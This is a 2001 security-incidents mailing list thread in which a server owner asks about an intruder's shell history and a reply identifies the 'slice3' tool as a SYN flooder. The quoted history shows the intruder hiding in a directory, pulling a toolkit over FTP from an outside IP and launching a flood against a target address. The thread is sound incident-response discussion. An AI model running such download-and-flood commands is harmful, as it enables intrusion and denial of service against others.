Security Incidents mailing list archives

RE: slice3 question

From: Royans Tharakan <RTharakan () ingenuity com>
Date: Thu, 19 Jul 2001 17:01:44 -0700

Slice is a SYN flooder. the IP you gave below is most probably dead by now.
http://www.google.com/search?hl=en&safe=off&q=slice+dos+tool+syn+flood

-----Original Message-----
From: Dirk Brockhausen [mailto:dirk () fantomaster com]
Sent: Thursday, July 19, 2001 4:03 PM
To: incidents () securityfocus com
Subject: slice3 question

Hi,

someone cracked our server.

Here is an excerpt from /root/.bash_history:

cd /dev/ida/.sys
uptime
ftp 203.238.91.4
tar -zxvf d.tar.gz
cd datapool/bin
./slice3 0 211.91.135.70 1 65000&

Any ideas?

Thanks,

Dirk

----------------------------------------------------------------------------

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

----------------------------------------------------------------------------

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Current thread:

slice3 question Dirk Brockhausen (Jul 19)
- <Possible follow-ups>
- RE: slice3 question Royans Tharakan (Jul 19)
- RE: slice3 question Maher Odeh (Jul 22)